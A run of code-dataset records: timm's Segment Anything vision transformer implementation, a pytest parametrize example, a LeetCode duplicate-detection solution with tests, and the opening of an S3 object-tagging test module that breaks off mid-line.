C) for width axis.\n q_size (Tuple): spatial sequence size of query q with (q_h, q_w).\n k_size (Tuple): spatial sequence size of key k with (k_h, k_w).\n\n Returns:\n bias (Tensor): attention bias to add to attention map\n \"\"\"\n q_h, q_w = q_size\n k_h, k_w = k_size\n Rh = get_rel_pos(q_h, k_h, rel_pos_h)\n Rw = get_rel_pos(q_w, k_w, rel_pos_w)\n\n B, _, dim = q.shape\n r_q = q.reshape(B, q_h, q_w, dim)\n rel_h = torch.einsum(\"bhwc,hkc->bhwk\", r_q, Rh)\n rel_w = torch.einsum(\"bhwc,wkc->bhwk\", r_q, Rw)\n\n attn_bias = rel_h[:, :, :, :, None] + rel_w[:, :, :, None, :]\n return attn_bias.reshape(-1, q_h * q_w, k_h * k_w)\n\n\nclass Attention(nn.Module):\n fused_attn: Final[bool]\n\n def __init__(\n self,\n dim,\n num_heads=8,\n qkv_bias=True,\n qk_norm=False,\n attn_drop=0.,\n proj_drop=0.,\n norm_layer=nn.LayerNorm,\n use_rel_pos: bool = False,\n input_size: Optional[Tuple[int, int]] = None,\n rope: Optional[nn.Module] = None,\n ):\n super().__init__()\n assert dim % num_heads == 0, 'dim should be divisible by num_heads'\n self.num_heads = num_heads\n self.head_dim = dim // num_heads\n self.scale = self.head_dim ** -0.5\n self.fused_attn = use_fused_attn()\n\n self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)\n self.q_norm = norm_layer(self.head_dim) if qk_norm else nn.Identity()\n self.k_norm = norm_layer(self.head_dim) if qk_norm else nn.Identity()\n self.attn_drop = nn.Dropout(attn_drop)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop)\n self.use_rel_pos = use_rel_pos\n if self.use_rel_pos:\n assert rope is None\n assert (\n input_size is not None\n ), \"Input size must be provided if using relative positional encoding.\"\n # initialize relative positional embeddings\n self.rel_pos_h = nn.Parameter(torch.zeros(\n 2 * input_size[0] - 1, self.head_dim))\n self.rel_pos_w = nn.Parameter(torch.zeros(\n 2 * input_size[1] - 1, self.head_dim))\n self.rope = rope\n\n def forward(self, x):\n B, H, W, _ = x.shape\n N = H * W\n x = x.reshape(B, N, -1)\n qkv = self.qkv(x).view(B, N, 3, self.num_heads, -1).permute(2, 0, 3, 1, 4)\n # qkv with shape (3, B, nHead, H * W, C)\n q, k, v = qkv.reshape(3, B * self.num_heads, N, -1).unbind(0)\n # q, k, v with shape (B * nHead, H * W, C)\n q, k = self.q_norm(q), self.k_norm(k)\n\n if self.use_rel_pos:\n attn_bias = get_decomposed_rel_pos_bias(q, self.rel_pos_h, self.rel_pos_w, (H, W), (H, W))\n else:\n attn_bias = None\n if self.rope is not None:\n rope = self.rope.get_embed()\n q = apply_rot_embed_cat(q, rope).type_as(v)\n k = apply_rot_embed_cat(k, rope).type_as(v)\n\n if self.fused_attn:\n x = torch.nn.functional.scaled_dot_product_attention(\n q, k, v,\n attn_mask=attn_bias,\n dropout_p=self.attn_drop.p if self.training else 0.,\n )\n else:\n q = q * self.scale\n attn = q @ k.transpose(-2, -1)\n if attn_bias is not None:\n attn = attn + attn_bias\n attn = attn.softmax(dim=-1)\n attn = self.attn_drop(attn)\n x = attn @ v\n\n x = x.view(B, self.num_heads, N, -1).transpose(1, 2).reshape(B, N, -1)\n x = self.proj(x)\n x = x.view(B, H, W, -1)\n return x\n\n\nclass LayerScale(nn.Module):\n def __init__(self, dim, init_values=1e-5, inplace=False):\n super().__init__()\n self.inplace = inplace\n self.gamma = nn.Parameter(init_values * torch.ones(dim))\n\n def forward(self, x):\n return x.mul_(self.gamma) if self.inplace else x * self.gamma\n\n\nclass Block(nn.Module):\n\n def __init__(\n self,\n dim,\n num_heads,\n mlp_ratio=4.,\n qkv_bias=True,\n qk_norm=False,\n proj_drop=0.,\n attn_drop=0.,\n init_values=None,\n drop_path=0.,\n act_layer=nn.GELU,\n norm_layer=nn.LayerNorm,\n mlp_layer=Mlp,\n use_rel_pos=False,\n window_size=0,\n input_size=None,\n rope=None,\n ):\n super().__init__()\n self.window_size = window_size\n self.norm1 = norm_layer(dim)\n self.attn = Attention(\n dim,\n num_heads=num_heads,\n qkv_bias=qkv_bias,\n qk_norm=qk_norm,\n attn_drop=attn_drop,\n proj_drop=proj_drop,\n norm_layer=norm_layer,\n use_rel_pos=use_rel_pos,\n input_size=input_size if window_size == 0 else (window_size, window_size),\n rope=rope,\n )\n self.ls1 = LayerScale(dim, init_values=init_values) if init_values else nn.Identity()\n self.drop_path1 = DropPath(drop_path) if drop_path > 0. else nn.Identity()\n\n self.norm2 = norm_layer(dim)\n self.mlp = mlp_layer(\n in_features=dim,\n hidden_features=int(dim * mlp_ratio),\n act_layer=act_layer,\n drop=proj_drop,\n )\n self.ls2 = LayerScale(dim, init_values=init_values) if init_values else nn.Identity()\n self.drop_path2 = DropPath(drop_path) if drop_path > 0. else nn.Identity()\n\n def forward(self, x):\n B, H, W, _ = x.shape\n\n shortcut = x\n x = self.norm1(x)\n # Window partition\n pad_hw: Optional[Tuple[int, int]] = None\n if self.window_size > 0:\n x, pad_hw = window_partition(x, self.window_size)\n\n x = self.drop_path1(self.ls1(self.attn(x)))\n\n # Reverse window partition\n if self.window_size > 0:\n x = window_unpartition(x, self.window_size, (H, W), pad_hw)\n\n x = shortcut + x\n\n x = x.reshape(B, H * W, -1) # MLP is faster for N, L, C tensor\n x = x + self.drop_path2(self.ls2(self.mlp(self.norm2(x))))\n x = x.reshape(B, H, W, -1)\n\n return x\n\n\ndef window_partition(x: torch.Tensor, window_size: int) -> Tuple[torch.Tensor, Tuple[int, int]]:\n \"\"\"\n Partition into non-overlapping windows with padding if needed.\n Args:\n x (tensor): input tokens with [B, H, W, C].\n window_size (int): window size.\n\n Returns:\n windows: windows after partition with [B * num_windows, window_size, window_size, C].\n (Hp, Wp): padded height and width before partition\n \"\"\"\n B, H, W, C = x.shape\n\n pad_h = (window_size - H % window_size) % window_size\n pad_w = (window_size - W % window_size) % window_size\n x = F.pad(x, (0, 0, 0, pad_w, 0, pad_h))\n Hp, Wp = H + pad_h, W + pad_w\n\n x = x.view(B, Hp // window_size, window_size, Wp // window_size, window_size, C)\n windows = x.permute(0, 1, 3, 2, 4, 5).contiguous().view(-1, window_size, window_size, C)\n return windows, (Hp, Wp)\n\n\ndef window_unpartition(\n windows: torch.Tensor, window_size: int, hw: Tuple[int, int], pad_hw: Optional[Tuple[int, int]] = None,\n) -> torch.Tensor:\n \"\"\"\n Window unpartition into original sequences and removing padding.\n Args:\n windows (tensor): input tokens with [B * num_windows, window_size, window_size, C].\n window_size (int): window size.\n pad_hw (Tuple): padded height and width (Hp, Wp).\n hw (Tuple): original height and width (H, W) before padding.\n\n Returns:\n x: unpartitioned sequences with [B, H, W, C].\n \"\"\"\n Hp, Wp = pad_hw if pad_hw is not None else hw\n H, W = hw\n B = windows.shape[0] // (Hp * Wp // window_size // window_size)\n x = windows.view(B, Hp // window_size, Wp // window_size, window_size, window_size, -1)\n x = x.permute(0, 1, 3, 2, 4, 5).contiguous().view(B, Hp, Wp, -1)\n x = x[:, :H, :W, :].contiguous()\n return x\n\n\nclass VisionTransformerSAM(nn.Module):\n \"\"\" Vision Transformer for Segment-Anything Model(SAM)\n\n A PyTorch impl of : `Exploring Plain Vision Transformer Backbones for Object Detection` or `Segment Anything Model (SAM)`\n - https://arxiv.org/abs/2010.11929\n \"\"\"\n\n def __init__(\n self,\n img_size: int = 1024,\n patch_size: int = 16,\n in_chans: int = 3,\n num_classes: int = 768,\n embed_dim: int = 768,\n depth: int = 12,\n num_heads: int = 12,\n mlp_ratio: float = 4.,\n qkv_bias: bool = True,\n qk_norm: bool = False,\n init_values: Optional[float] = None,\n pre_norm: bool = False,\n drop_rate: float = 0.,\n pos_drop_rate: float = 0.,\n patch_drop_rate: float = 0.,\n proj_drop_rate: float = 0.,\n attn_drop_rate: float = 0.,\n drop_path_rate: float = 0.,\n weight_init: str = '',\n embed_layer: Callable = partial(\n PatchEmbed, output_fmt=Format.NHWC, strict_img_size=False),\n norm_layer: Optional[Callable] = nn.LayerNorm,\n act_layer: Optional[Callable] = nn.GELU,\n block_fn: Callable = Block,\n mlp_layer: Callable = Mlp,\n use_abs_pos: bool = True,\n use_rel_pos: bool = False,\n use_rope: bool = False,\n window_size: int = 14,\n global_attn_indexes: Tuple[int, ...] = (),\n neck_chans: int = 256,\n global_pool: str = 'avg',\n head_hidden_size: Optional[int] = None,\n ref_feat_shape: Optional[Tuple[Tuple[int, int], Tuple[int, int]]] = None\n ):\n \"\"\"\n Args:\n img_size: Input image size.\n patch_size: Patch size.\n in_chans: Number of image input channels.\n num_classes: Mumber of classes for classification head.\n global_pool: Type of global pooling for final sequence (default: 'token').\n embed_dim: Transformer embedding dimension.\n depth: Depth of transformer.\n num_heads: Number of attention heads.\n mlp_ratio: Ratio of mlp hidden dim to embedding dim.\n qkv_bias: Enable bias for qkv projections if True.\n init_values: Layer-scale init values (layer-scale enabled if not None).\n drop_rate: Head dropout rate.\n pos_drop_rate: Position embedding dropout rate.\n attn_drop_rate: Attention dropout rate.\n drop_path_rate: Stochastic depth rate.\n weight_init: Weight initialization scheme.\n embed_layer: Patch embedding layer.\n norm_layer: Normalization layer.\n act_layer: MLP activation layer.\n block_fn: Transformer block layer.\n use_abs_pos: If True, use absolute positional embeddings.\n use_rel_pos: If True, add relative positional embeddings to the attention map.\n use_rope: If True, add rotary position embeddings to q/k in attention block.\n window_size: Window size for window attention blocks. If 0, not use window attention.\n global_attn_indexes: Indexes for blocks using global attention. Used when window_size > 0.\n global_pool: Global pooling type.\n head_hidden_size: If set, use NormMlpHead\n ref_feat_shape: Tuple of reference feature shapes for ROPE, (global, local)\n \"\"\"\n super().__init__()\n norm_layer = norm_layer or partial(nn.LayerNorm, eps=1e-6)\n act_layer = act_layer or nn.GELU\n\n self.num_classes = num_classes\n self.global_pool = global_pool\n # num_features for consistency with other models\n self.num_features = self.embed_dim = embed_dim\n self.grad_checkpointing = False\n\n self.patch_embed = embed_layer(\n img_size=img_size,\n patch_size=patch_size,\n in_chans=in_chans,\n embed_dim=embed_dim,\n bias=not pre_norm, # disable bias if pre-norm is used\n )\n grid_size = self.patch_embed.grid_size\n if use_abs_pos:\n # Initialize absolute positional embedding with pretrain image size.\n self.pos_embed = nn.Parameter(torch.zeros(1, grid_size[0], grid_size[1], embed_dim))\n else:\n self.pos_embed = None\n self.pos_drop = nn.Dropout(p=pos_drop_rate)\n if patch_drop_rate > 0:\n self.patch_drop = PatchDropout(\n patch_drop_rate,\n num_prefix_tokens=0,\n )\n else:\n self.patch_drop = nn.Identity()\n self.norm_pre = norm_layer(embed_dim) if pre_norm else nn.Identity()\n\n if use_rope:\n assert not use_rel_pos, \"ROPE and relative pos embeddings should not be enabled at same time\"\n if ref_feat_shape is not None:\n assert len(ref_feat_shape) == 2\n ref_feat_shape_global = to_2tuple(ref_feat_shape[0])\n ref_feat_shape_window = to_2tuple(ref_feat_shape[1])\n else:\n ref_feat_shape_global = ref_feat_shape_window = None\n self.rope_global = RotaryEmbeddingCat(\n embed_dim // num_heads,\n in_pixels=False,\n feat_shape=grid_size,\n ref_feat_shape=ref_feat_shape_global,\n )\n self.rope_window = RotaryEmbeddingCat(\n embed_dim // num_heads,\n in_pixels=False,\n feat_shape=to_2tuple(window_size),\n ref_feat_shape=ref_feat_shape_window,\n )\n else:\n self.rope_global = None\n self.rope_window = None\n\n # stochastic depth decay rule\n dpr = [x.item() for x in torch.linspace(0, drop_path_rate, depth)]\n self.blocks = nn.Sequential(*[\n block_fn(\n dim=embed_dim,\n num_heads=num_heads,\n mlp_ratio=mlp_ratio,\n qkv_bias=qkv_bias,\n qk_norm=qk_norm,\n init_values=init_values,\n proj_drop=proj_drop_rate,\n attn_drop=attn_drop_rate,\n drop_path=dpr[i],\n norm_layer=norm_layer,\n act_layer=act_layer,\n mlp_layer=mlp_layer,\n use_rel_pos=use_rel_pos,\n window_size=window_size if i not in global_attn_indexes else 0,\n input_size=grid_size,\n rope=self.rope_window if i not in global_attn_indexes else self.rope_global,\n )\n for i in range(depth)])\n\n if neck_chans:\n self.neck = nn.Sequential(\n nn.Conv2d(\n embed_dim,\n neck_chans,\n kernel_size=1,\n bias=False,\n ),\n LayerNorm2d(neck_chans),\n nn.Conv2d(\n neck_chans,\n neck_chans,\n kernel_size=3,\n padding=1,\n bias=False,\n ),\n LayerNorm2d(neck_chans),\n )\n self.num_features = neck_chans\n else:\n if head_hidden_size:\n self.neck = nn.Identity()\n else:\n # should have a final norm with standard ClassifierHead\n self.neck = LayerNorm2d(embed_dim)\n neck_chans = embed_dim\n\n # Classifier Head\n if head_hidden_size:\n self.head = NormMlpClassifierHead(\n neck_chans,\n num_classes,\n hidden_size=head_hidden_size,\n pool_type=global_pool,\n drop_rate=drop_rate,\n )\n else:\n self.head = ClassifierHead(\n neck_chans,\n num_classes,\n pool_type=global_pool,\n drop_rate=drop_rate,\n )\n\n @torch.jit.ignore\n def no_weight_decay(self):\n return {'pos_embed', 'dist_token'}\n\n @torch.jit.ignore\n def group_matcher(self, coarse=False):\n return dict(\n stem=r'^pos_embed|patch_embed', # stem and embed\n blocks=[(r'^blocks\\.(\\d+)', None), (r'^norm', (99999,))]\n )\n\n @torch.jit.ignore\n def set_grad_checkpointing(self, enable=True):\n self.grad_checkpointing = enable\n\n @torch.jit.ignore\n def get_classifier(self):\n return self.head\n\n def reset_classifier(self, num_classes=0, global_pool=None):\n self.head.reset(num_classes, global_pool)\n\n def forward_features(self, x):\n x = self.patch_embed(x)\n if self.pos_embed is not None:\n # dynamically resize abs pos embedding if needed\n x = x + resample_abs_pos_embed_nhwc(self.pos_embed, x.shape[1:3])\n x = self.pos_drop(x)\n x = self.patch_drop(x)\n x = self.norm_pre(x)\n if self.grad_checkpointing and not torch.jit.is_scripting():\n x = checkpoint_seq(self.blocks, x)\n else:\n x = self.blocks(x)\n x = self.neck(x.permute(0, 3, 1, 2))\n return x\n\n def forward_head(self, x, pre_logits: bool = False):\n return self.head(x, pre_logits=True) if pre_logits else self.head(x)\n\n def forward(self, x):\n x = self.forward_features(x)\n x = self.forward_head(x)\n return x\n\n\ndef checkpoint_filter_fn(\n state_dict,\n model,\n):\n \"\"\" Remap SAM checkpoints -> timm \"\"\"\n sam_checkpoint = 'image_encoder.patch_embed.proj.weight' in state_dict\n out_dict = {}\n for k, v in state_dict.items():\n if k.startswith('image_encoder.'):\n k = k[14:]\n k = k.replace('mlp.lin', 'mlp.fc')\n else:\n if sam_checkpoint:\n continue\n out_dict[k] = v\n return out_dict\n\n\ndef _cfg(url='', **kwargs):\n return {\n 'url': url,\n 'num_classes': 1000, 'input_size': (3, 1024, 1024), 'pool_size': None,\n 'crop_pct': .9, 'interpolation': 'bicubic', 'fixed_input_size': True,\n 'mean': IMAGENET_INCEPTION_MEAN, 'std': IMAGENET_INCEPTION_STD,\n 'first_conv': 'patch_embed.proj', 'classifier': 'head.fc',\n **kwargs\n }\n\n\ndefault_cfgs = generate_default_cfgs({\n\n # Segment-Anyhing Model (SAM) pretrained - https://github.com/facebookresearch/segment-anything (no classifier head, for fine-tune/features only)\n 'samvit_base_patch16.sa1b': _cfg(\n url='https://dl.fbaipublicfiles.com/segment_anything/sam_vit_b_01ec64.pth',\n hf_hub_id='timm/',\n license='apache-2.0',\n mean=IMAGENET_DEFAULT_MEAN, std=IMAGENET_DEFAULT_STD, num_classes=0,\n input_size=(3, 1024, 1024), crop_pct=1.0),\n 'samvit_large_patch16.sa1b': _cfg(\n url='https://dl.fbaipublicfiles.com/segment_anything/sam_vit_l_0b3195.pth',\n hf_hub_id='timm/',\n license='apache-2.0',\n mean=IMAGENET_DEFAULT_MEAN, std=IMAGENET_DEFAULT_STD, num_classes=0,\n input_size=(3, 1024, 1024), crop_pct=1.0),\n 'samvit_huge_patch16.sa1b': _cfg(\n url='https://dl.fbaipublicfiles.com/segment_anything/sam_vit_h_4b8939.pth',\n hf_hub_id='timm/',\n license='apache-2.0',\n mean=IMAGENET_DEFAULT_MEAN, std=IMAGENET_DEFAULT_STD, num_classes=0,\n input_size=(3, 1024, 1024), crop_pct=1.0),\n\n 'samvit_base_patch16_224': _cfg(\n mean=IMAGENET_DEFAULT_MEAN, std=IMAGENET_DEFAULT_STD, num_classes=1000,\n input_size=(3, 224, 224), crop_pct=0.9),\n})\n\n\ndef _create_vision_transformer(variant, pretrained=False, **kwargs):\n if kwargs.get('features_only', None):\n raise RuntimeError(\n 'features_only not implemented for Vision Transformer models.')\n\n return build_model_with_cfg(\n VisionTransformerSAM,\n variant,\n pretrained,\n pretrained_filter_fn=checkpoint_filter_fn,\n **kwargs,\n )\n\n\n@register_model\ndef samvit_base_patch16(pretrained=False, **kwargs) -> VisionTransformerSAM:\n \"\"\" ViT-B/16 for Segment-Anything\n \"\"\"\n model_args = dict(\n patch_size=16, embed_dim=768, depth=12, num_heads=12, global_attn_indexes=[2, 5, 8, 11],\n window_size=14, use_rel_pos=True, img_size=1024,\n )\n model = _create_vision_transformer(\n 'samvit_base_patch16', pretrained=pretrained, **dict(model_args, **kwargs))\n return model\n\n\n@register_model\ndef samvit_large_patch16(pretrained=False, **kwargs) -> VisionTransformerSAM:\n \"\"\" ViT-L/16 for Segment-Anything\n \"\"\"\n model_args = dict(\n patch_size=16, embed_dim=1024, depth=24, num_heads=16, global_attn_indexes=[5, 11, 17, 23],\n window_size=14, use_rel_pos=True, img_size=1024,\n )\n model = _create_vision_transformer(\n 'samvit_large_patch16', pretrained=pretrained, **dict(model_args, **kwargs))\n return model\n\n\n@register_model\ndef samvit_huge_patch16(pretrained=False, **kwargs) -> VisionTransformerSAM:\n \"\"\" ViT-H/16 for Segment-Anything\n \"\"\"\n model_args = dict(\n patch_size=16, embed_dim=1280, depth=32, num_heads=16, global_attn_indexes=[7, 15, 23, 31],\n window_size=14, use_rel_pos=True, img_size=1024,\n )\n model = _create_vision_transformer(\n 'samvit_huge_patch16', pretrained=pretrained, **dict(model_args, **kwargs))\n return model\n\n\n@register_model\ndef samvit_base_patch16_224(pretrained=False, **kwargs) -> VisionTransformerSAM:\n \"\"\" ViT-B/16 based on samvit arch\n \"\"\"\n model_args = dict(\n patch_size=16, embed_dim=768, depth=12, num_heads=12, global_attn_indexes=[2, 5, 8, 11],\n window_size=14, use_rel_pos=True, use_abs_pos=False, img_size=224, neck_chans=None,\n )\n model = _create_vision_transformer(\n 'samvit_base_patch16_224', pretrained=pretrained, **dict(model_args, **kwargs))\n return model\n\n","repo_name":"huggingface/pytorch-image-models","sub_path":"timm/models/vision_transformer_sam.py","file_name":"vision_transformer_sam.py","file_ext":"py","file_size_in_byte":25122,"program_lang":"python","lang":"en","doc_type":"code","stars":27689,"dataset":"github-code","pt":"76"} +{"seq_id":"37365643397","text":"import pytest\n\n\n@pytest.fixture()\ndef login(request):\n x = request.param[\"x\"]\n y = request.param[\"y\"]\n if x==y:\n return True\n else:\n return False\n\ntest_data = [{\"x\":1+1,\"y\":2},{\"x\":1+2,\"y\":3},{\"x\":1+4,\"y\":4}]\n\n@pytest.mark.parametrize(\"login\",test_data,indirect=True)\ndef test_login(login):\n a=login\n print(\"a=%s\"%a)\n\n\n","repo_name":"GStudent1/demo","sub_path":"testcase/study_parametrizing/test_parametrizing_second.py","file_name":"test_parametrizing_second.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27769630611","text":"import unittest\n\n\"\"\"\nwrite down thoughts\n1. create a hashmap to store the index of last seen value\n\"\"\"\n\n\nclass Solution(object):\n def containsNearbyDuplicate(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: bool\n \"\"\"\n hashmap = {}\n for i, num in enumerate(nums):\n # note: you should NOT use if not hashmap.get(), because 0 is considered falsy!!!\n index = hashmap.get(num)\n if index is None or i - index > k:\n hashmap[num] = i\n else:\n return True\n return False\n\n\nclass TestSolution(unittest.TestCase):\n def test1(self):\n self.assertEqual(True, Solution().containsNearbyDuplicate([1, 2, 3, 1], 3))\n\n def test2(self):\n self.assertEqual(False, Solution().containsNearbyDuplicate([1, 2, 3, 1, 2, 3], 2))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"iseryanxie/leetcode","sub_path":"test_219_contain_duplicate_ii.py","file_name":"test_219_contain_duplicate_ii.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30581054451","text":"import base64\nimport datetime\nimport hashlib\nimport hmac\nimport json\nimport string\nfrom collections import OrderedDict\n\nimport pytest\nimport pytz\nimport requests\n\nfrom s3tests.tests import TestBaseClass, assert_raises, ClientError, get_client\n\n\nclass TestTaggingBase(TestBaseClass):\n\n def make_random_string(self, size):\n return self.gen_rand_string(size, chars=string.ascii_letters)\n\n\n@pytest.mark.sio\nclass TestObjectTagging(TestTaggingBase):\n\n def test_get_obj_tagging(self, s3cfg_global_unique):\n \"\"\"\n 测试-验证设置和获取对象的tagging\n \"\"\"\n key = 'testputtags'\n client = get_client(s3cfg_global_unique)\n bucket_name = self.create_key_with_random_content(s3cfg_global_unique, key)\n\n input_tag_set = self.create_simple_tag_set(2)\n response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tag_set)\n self.eq(response['ResponseMetadata']['HTTPStatusCode'], 200)\n\n response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n self.eq(response['TagSet'], input_tag_set['TagSet'])\n\n def test_get_obj_head_tagging(self, s3cfg_global_unique):\n \"\"\"\n 测试-验证head-object里含有设置的tag\n \"\"\"\n key = 'testputtags'\n client = get_client(s3cfg_global_unique)\n bucket_name = self.create_key_with_random_content(s3cfg_global_unique, key)\n\n count = 2\n input_tag_set = self.create_simple_tag_set(count)\n response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tag_set)\n self.eq(response['ResponseMetadata']['HTTPStatusCode'], 200)\n\n response = client.head_object(Bucket=bucket_name, Key=key)\n self.eq(response['ResponseMetadata']['HTTPStatusCode'], 200)\n self.eq(response['ResponseMetadata']['HTTPHeaders']['x-amz-tagging-count'], str(count))\n\n def test_put_max_tags(self, s3cfg_global_unique):\n \"\"\"\n 测试-验证最大允许设置的tags(10个)\n \"\"\"\n key = 'testputmaxtags'\n client = get_client(s3cfg_global_unique)\n bucket_name = self.create_key_with_random_content(s3cfg_global_unique, key)\n\n input_tag_set = self.create_simple_tag_set(10)\n response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tag_set)\n self.eq(response['ResponseMetadata']['HTTPStatusCode'], 200)\n\n response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n self.eq(response['TagSet'], input_tag_set['TagSet'])\n\n def test_put_excess_tags(self, s3cfg_global_unique):\n \"\"\"\n 测试-验证最大允许设置的tags(11个), failed\n \"\"\"\n key = 'testputmaxtags'\n client = get_client(s3cfg_global_unique)\n bucket_name = self.create_key_with_random_content(s3cfg_global_unique, key)\n\n input_tag_set = self.create_simple_tag_set(11)\n e = assert_raises(\n ClientError, client.put_object_tagging, Bucket=bucket_name, Key=key, Tagging=input_tag_set)\n status, error_code = self.get_status_and_error_code(e.response)\n self.eq(status, 400)\n self.eq(error_code, 'InvalidTag')\n\n response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n self.eq(len(response['TagSet']), 0)\n\n def test_put_max_kvsize_tags(self, s3cfg_global_unique):\n \"\"\"\n 测试-验证设置tag是key和value的最大字符数:key为128,value为256\n \"\"\"\n key = 'testputmaxkeysize'\n client = get_client(s3cfg_global_unique)\n bucket_name = self.create_key_with_random_content(s3cfg_global_unique, key)\n\n tag_set = []\n for i in range(10):\n k = self.make_random_string(128)\n v = self.make_random_string(256)\n tag_set.append({'Key': k, 'Value': v})\n\n input_tag_set = {'TagSet': tag_set}\n\n response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tag_set)\n self.eq(response['ResponseMetadata']['HTTPStatusCode'], 200)\n\n response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n for kv_pair in response['TagSet']:\n self.eq((kv_pair in input_tag_set['TagSet']), True)\n\n def test_put_excess_key_tags(self, s3cfg_global_unique):\n \"\"\"\n 测试-验证设置tag是key和value的最大字符数:key为129,value为256,failed\n \"\"\"\n key = 'testputexcesskeytags'\n client = get_client(s3cfg_global_unique)\n bucket_name = self.create_key_with_random_content(s3cfg_global_unique, key)\n\n tag_set = []\n for i in range(10):\n k = self.make_random_string(129)\n v = self.make_random_string(256)\n tag_set.append({'Key': k, 'Value': v})\n\n input_tag_set = {'TagSet': tag_set}\n e = assert_raises(ClientError, client.put_object_tagging, Bucket=bucket_name, Key=key, Tagging=input_tag_set)\n status, error_code = self.get_status_and_error_code(e.response)\n self.eq(status, 400)\n self.eq(error_code, 'InvalidTag')\n\n response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n self.eq(len(response['TagSet']), 0)\n\n def test_put_excess_val_tags(self, s3cfg_global_unique):\n \"\"\"\n 测试-验证设置tag是key和value的最大字符数:key为128,value为257,failed\n \"\"\"\n key = 'testputexcesskeytags'\n client = get_client(s3cfg_global_unique)\n bucket_name = self.create_key_with_random_content(s3cfg_global_unique, key)\n\n tag_set = []\n for i in range(10):\n k = self.make_random_string(128)\n v = self.make_random_string(257)\n tag_set.append({'Key': k, 'Value': v})\n\n input_tag_set = {'TagSet': tag_set}\n e = assert_raises(ClientError, client.put_object_tagging, Bucket=bucket_name, Key=key, Tagging=input_tag_set)\n status, error_code = self.get_status_and_error_code(e.response)\n self.eq(status, 400)\n self.eq(error_code, 'InvalidTag')\n\n response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n self.eq(len(response['TagSet']), 0)\n\n def test_put_modify_tags(self, s3cfg_global_unique):\n \"\"\"\n 测试-验证修改已存在的tags\n \"\"\"\n key = 'testputmodifytags'\n client = get_client(s3cfg_global_unique)\n bucket_name = self.create_key_with_random_content(s3cfg_global_unique, key)\n\n tag_set = [{'Key': 'key', 'Value': 'val'}, {'Key': 'key2', 'Value': 'val2'}]\n\n input_tag_set = {'TagSet': tag_set}\n\n response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tag_set)\n self.eq(response['ResponseMetadata']['HTTPStatusCode'], 200)\n\n response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n self.eq(response['TagSet'], input_tag_set['TagSet'])\n\n tag_set2 = [{'Key': 'key3', 'Value': 'val3'}]\n\n input_tag_set2 = {'TagSet': tag_set2}\n\n response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tag_set2)\n self.eq(response['ResponseMetadata']['HTTPStatusCode'], 200)\n\n response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n self.eq(response['TagSet'], input_tag_set2['TagSet'])\n\n def test_put_delete_tags(self, s3cfg_global_unique):\n \"\"\"\n 测试-验证删除tags\n \"\"\"\n key = 'testputmodifytags'\n client = get_client(s3cfg_global_unique)\n bucket_name = self.create_key_with_random_content(s3cfg_global_unique, key)\n\n input_tag_set = self.create_simple_tag_set(2)\n response = client.put_object_tagging(Bucket=bucket_name, Key=key, Tagging=input_tag_set)\n self.eq(response['ResponseMetadata']['HTTPStatusCode'], 200)\n\n response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n self.eq(response['TagSet'], input_tag_set['TagSet'])\n\n response = client.delete_object_tagging(Bucket=bucket_name, Key=key)\n self.eq(response['ResponseMetadata']['HTTPStatusCode'], 204)\n\n response = client.get_object_tagging(Bucket=bucket_name, Key=key)\n self.eq(len(response['TagSet']), 0)\n\n def test_post_object_tags_anonymous_request(self, s3cfg_global_unique):\n \"\"\"\n 测试-验证设置对象tags,通过browser based via POST request\n \"\"\"\n client = get_client(s3cfg_global_unique)\n bucket_name = self.get_new_bucket_name(s3cfg_global_unique)\n url = self.get_post_url(s3cfg_global_unique, bucket_name)\n client.create_bucket(ACL='public-read-write', Bucket=bucket_name)\n\n key_name = \"foo.txt\"\n input_tag_set = self.create_simple_tag_set(2)\n # xml_input_tag_set is the same as input_tag_set in xml.\n # There is not a simple way to change input_tag_set to xml like there is in the boto2 tetss\n xml_input_tag_set = \"0011\"\n\n payload = OrderedDict([\n (\"key\", key_name),\n (\"acl\", \"public-read\"),\n (\"Content-Type\", \"text/plain\"),\n (\"tagging\", xml_input_tag_set),\n ('file', 'bar'),\n ])\n\n r = requests.post(url, files=payload, verify=s3cfg_global_unique.default_ssl_verify)\n self.eq(r.status_code, 204)\n response = client.get_object(Bucket=bucket_name, Key=key_name)\n body = self.get_body(response)\n self.eq(body, 'bar')\n\n response = client.get_object_tagging(Bucket=bucket_name, Key=key_name)\n self.eq(response['TagSet'], input_tag_set['TagSet'])\n\n def test_post_object_tags_authenticated_request(self, s3cfg_global_unique):\n \"\"\"\n 测试-验证\n (operation='authenticated browser based upload via POST request')\n (assertion='succeeds and returns written data')\n \"\"\"\n client = get_client(s3cfg_global_unique)\n bucket_name = self.get_new_bucket(client, s3cfg_global_unique)\n\n url = self.get_post_url(s3cfg_global_unique, bucket_name)\n utc = pytz.utc\n expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)\n\n policy_document = {\"expiration\": expires.strftime(\"%Y-%m-%dT%H:%M:%SZ\"),\n \"conditions\": [\n {\"bucket\": bucket_name},\n [\"starts-with\", \"$key\", \"foo\"],\n {\"acl\": \"private\"},\n [\"starts-with\", \"$Content-Type\", \"text/plain\"],\n [\"content-length-range\", 0, 1024],\n [\"starts-with\", \"$tagging\", \"\"]\n ]}\n\n # xml_input_tag_set is the same as `input_tag_set = self.create_simple_tag_set(2)` in xml\n # There is not a simple way to change 